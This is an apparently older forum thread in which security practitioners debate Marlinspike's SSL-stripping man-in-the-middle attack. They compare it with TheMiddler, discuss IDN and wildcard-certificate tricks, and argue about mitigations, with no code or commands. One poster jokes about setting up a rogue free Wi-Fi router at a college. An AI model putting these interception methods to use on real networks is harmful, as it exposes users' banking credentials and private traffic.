Wow, major https/http hole revealed at blackhat.....

[bsobel]

From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

 

[SagaLore]

Originally posted by: bsobel
I don't know what you don't understand, this has been exploited for YEARS. TheMiddler was released last year, it has the same functionality. This is just one more of a LARGE number of SSL MiTM tools. Saying 'never been really exploited' is bullshit.

This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

TheMiddler exploits mixed http/https sites. It can inject root certs into a browser. It replaces https links with http links as part of a race condition. We're talking about completely different vectors. Sure, they're both man-in-the-middle attacks involving ssl, but has does a previous tool void any concern for this new one?

 

[bsobel]

That is what is in their address bar. They have a VALID SSL session. They have the little lock. Unless the user is looking at the end of every single URL AND/OR looking at the certificate, they are none the wiser.

And they no longer have the green title bar since the attacker didn't get an extended validation cert...

And IF they went to https://mybank.com instead of http://mybank.com to start with, this attack wouldn't work, same as all of the other ssl stripping attacks.

 

[Kev]

interesting

 

[Codewiz]

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

 

[bsobel]

It can inject root certs into a browser

Oh what completely bullshit. Link please. This is a network attack, it in NO WAY modifies the root certs on the browser. Jesus, are you this dense?

 

[Codewiz]

Originally posted by: bsobel

That is what is in their address bar. They have a VALID SSL session. They have the little lock. Unless the user is looking at the end of every single URL AND/OR looking at the certificate, they are none the wiser.

And they no longer have the green title bar since the attacker didn't get an extended validation cert...

And IF they went to <a target=_blank class=ftalternatingbarlinklarge href="https://mybank.com">https://mybank.com</a> instead of http://mybank.com to start with, this attack wouldn't work, same as all of the other ssl stripping attacks.

Once again I agree. But we are talking about what 99.9% of the population does. It will be very successful because the negative and positive alerts for https in browsers will not protect the user.

 

[bsobel]

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

See we agree. You just need to realize these attacks have existed IN THE WILD for years, I've written countermeasures for them that go into products. We helped create extended validation certs for this reason. This is a PITA, but it's not new or novel.

 

[bsobel]

This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

What is unique, it does the same thing as THeMiddler for https stripping attacks and the same thing as an sslstripper for its ssl strip attack. Both extremely well known attacks that have existed for years.

And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

 

[Codewiz]

Originally posted by: bsobel

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

See we agree. You just need to realize these attacks have existed IN THE WILD for years, I've written countermeasures for them that go into products. We helped create extended validation certs for this reason. This is a PITA, but it's not new or novel.

Once again I will say this particular GENERAL method has not been "in the wild" for years. Variants sure. Specialized versions. Sure. But this is a general use method that will fool most browsers and most users. And it is simple to use to boot. That is the difference. Almost every previous MITM attack is VERY scoped to specific websites. This is a general attack that will get many many people.

This guy took pieces from his previous attacks. Other attacks and packages it all together for a whole new method that is very savy.

My point is saying something like, "this is nothing new" gives the impression that it isn't a real threat. This is a real threat. I will admit I shouldn't have jumped all over the "this is nothing new" comment but I should have said is still very dangerous to the general public.

 

[SagaLore]

Originally posted by: bsobel
As for TheMiddler, google for it. It as shown at Blackhat/Defcon last year. There is absolutely nothing knew about this attack. Its simply a proxy that ensures any HTTPS addresses in a page are replaced with HTTP links. Since most sites support both, the user never gets directed to SSL and since their info in plaintext. Its not rocket science the only 'interesting' thing here is that there is one more 'off the shelf' tool for the script kiddies to use. Prior to TheMiddler these attacks were more custom and not shared...

For those looking for it, here is an explanation of what TheMiddler can do:

http://mirror.sweon.net/defcon.../defcon-16-beale-2.pdf

Seems the original site that hosted it as opensource has been taken down.

 

[Codewiz]

Originally posted by: bsobel

This isn't about whether or not SSL has been exploited - this is a particular tool that performs a particular function, with a unique result.

What is unique, it does the same thing as THeMiddler for https stripping attacks and the same thing as an sslstripper for its ssl strip attack. Both extremely well known attacks that have existed for years.

And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I will give my credentials. I work in the identity management realm. Specifically federated identity. I don't have to really worry as much about this particular attack in my work because we utilize client certificates.

 

[bsobel]

Once again I will say this particular GENERAL method has not been "in the wild" for years.

Yes it has, I deal with these attacks in my work.

 

[SagaLore]

Originally posted by: bsobel
And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I just assumed that is what you do since you tout how much you work at Symantec. FYI, you attacked me first and I responded in kind.

I'm a Sr. Network Security Analyst for a MSSP. I admit my article writing skills are poor, but I just needed to get something posted as quick as possible so I could get back to real work.

 

[bsobel]

Originally posted by: SagaLore

Originally posted by: bsobel
And what is 'av helpdesk', since you attacked my credentials I'd like you to explain what it is you think I do. Id also like to know what you do besides poorly copy/paste articles to a website and ask for free software occasionally.

I just assumed that is what you do since you tout how much you work at Symantec. FYI, you attacked me first and I responded in kind.

I'm a Sr. Network Security Analyst for a MSSP. I admit my article writing skills are poor, but I just needed to get something posted as quick as possible so I could get back to real work.

Which MSSP? And I didnt attack you, I told you you were wrong. I'd suggest you learn the difference. As far as 'posted as quick as possible', you should try to be accurate next time even if it takes a few more minutes. And I don't 'tout' that I work there, I disclaim it in posts that involve my products so users know my bias up front and can factor that in.

 

[Crusty]

Originally posted by: bsobel

SSH uses SSL. The weakness is in SSL, not https or ssh.

Actually this is a weakness in https much more than SSL itself. It relies on seeing the plaintext traffic and stripping out ssl links (or directing the user to a different domain on SSL for which the attacker got a cert). Its not a break of SSL itself at all.

Yeah, the article I read didn't make a note of the fact that you need the plaintext traffic first. I thought it was just like the exploit that the MD5 collisions would allow. Either way, publicly broadcast wifi = bad news for personal information.

 

[SagaLore]

Originally posted by: bsobel
Which MSSP? And I didnt attack you, I told you you were wrong. I'd suggest you learn the difference. As far as 'posted as quick as possible', you should try to be accurate next time even if it takes a few more minutes. And I don't 'tout' that I work there, I disclaim it in posts that involve my products so users know my bias up front and can factor that in.

You're allowed to tell me I'm wrong, and point out why. These comments on the other hand:

Originally posted by: bsobel
What a completely bullshit article

Seriously, learn to read.

Seriously, you have no business commenting on this.

Hurt. :brokenheart:

 

[five40]

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

 

[ivan2]

looks like it's about time i set up a free wireless router at the local college...

 

[Codewiz]

Originally posted by: bsobel

Once again I will say this particular GENERAL method has not been "in the wild" for years.

Yes it has, I deal with these attacks in my work.

So there are tools out there that will sit on a network and work for any and every https website.

A tool that will provide the user with HTTPS in the browser without any browser notifications that there are any problems(e.g. domain mismatch, etc..).

If this exploits has already existed in the wild can you provide some links, discussion on said exploits.

I have never seen someone pair IDN-valid characters with valid wildcard ssl certs combined with SSL stripping to completely fool savy web users. If it has existed in the wild, I just want to see some references.

 

[bsobel]

Originally posted by: five40

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

Actually it does, since the MiTM has to redirect the user to wildcarded domain name. The browser will complain since the cert won't match the entered URL.

 

[bsobel]

If it has existed in the wild, I just want to see some references.

The closest public reference I can give you is the middler reference I talked about before. You can also google for sslstripping it should be pretty obvious. I've inspected hardware/software put together to do this. At Defcon there where some great examples of the evil twin attack and this that involved the AP built into old books (hollowed out enough to hold the AP with modified WRT stack, and batteries, and an evdo card for the passthrough).

 

[Codewiz]

Originally posted by: five40

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

It does if you open your browser and go directly to https://www.wachovia.com instead of http://www.wachovia.com

The domain trick is just another tool that fools users that want to see https in the address bar. It is no different than the http trick except the tool now lets the user browser create a https connection to the tool with a valid certificate and URL that appears valid

 

[Codewiz]

Originally posted by: bsobel

Originally posted by: five40

Originally posted by: Codewiz

Originally posted by: bsobel
From Information Week:

"Marlinspike's attack isn't so much technical as it is social engineering. It relies on users failing to recognize the distinction between HTTP and HTTPS sessions and on other insecure habits, like people's penchant for typing, say, "www.wellsfargo.com" without the HTTPS portion of the URL."

Correct, if everyone typed in https for every bank website, then the attack is useless. But that is not what people do.

punching in https doesn't stop the attack when the domain trick is used

Actually it does, since the MiTM has to redirect the user to wildcarded domain name. The browser will complain since the cert won't match the entered URL.

The cert will match the entered URL.

 

[SagaLore]

Originally posted by: Crusty

Originally posted by: bsobel

SSH uses SSL. The weakness is in SSL, not https or ssh.

Actually this is a weakness in https much more than SSL itself. It relies on seeing the plaintext traffic and stripping out ssl links (or directing the user to a different domain on SSL for which the attacker got a cert). Its not a break of SSL itself at all.

Yeah, the article I read didn't make a note of the fact that you need the plaintext traffic first. I thought it was just like the exploit that the MD5 collisions would allow. Either way, publicly broadcast wifi = bad news for personal information.

Only going by the article, here is what happens:

* Watches traffic
* When it sees HTTPS, it substitutes it with HTTP
* Tells the server that an encrypted page has been sent
* Adds padlock icon to URL

So the server actually doesn't know you're on http, so it won't redirect you? Its funny that the padlock icon is what really is getting everyone.